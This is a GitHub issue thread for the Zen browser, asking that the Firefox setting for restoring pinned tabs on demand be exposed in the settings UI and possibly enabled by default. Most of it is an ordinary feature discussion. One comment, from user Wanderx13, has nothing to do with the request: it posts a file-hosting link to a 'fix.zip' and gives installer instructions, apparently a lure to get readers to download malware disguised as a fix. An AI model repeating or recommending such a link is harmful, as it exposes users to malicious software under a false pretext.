### ISSUE TITLE
Enable "tabs on demand" (and/or expose this setting)

### ISSUE THREAD

**Issue by alicerunsonfedora** [zen-browser/desktop#709]
### What feature would you like to see?

There's a Firefox config flag called `browser.sessionstore.restore_pinned_tabs_on_demand` that lets pinned tabs be restored on demand. I think it would be a good idea to have this exposed in settings and potentially have it enabled by default, so that the browser doesn't use as many resources when restoring from a previous session.

**Comment by bw8686** [comment]
While this isn't publicly exposed in a UI this setting can be toggled by about:config. If this helped you please close this issue to prevent spam.

**Comment by alicerunsonfedora** [comment]
> While this isn't publicly exposed in a UI this setting can be toggled by about:config. If this helped you please close this issue to prevent spam.

I am aware of this, as I have it enabled myself. However, I do think there should be some sort of UI exposed, as I don't think users should have to dig into `about:config` for this, hence the feature request.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by mauro-balades** [comment]
This issue should be discussed further. You can view and continue the discussion here: https://github.com/zen-browser/desktop/discussions/752

 ~ This is an automatic operation to better enhancements requests organization.
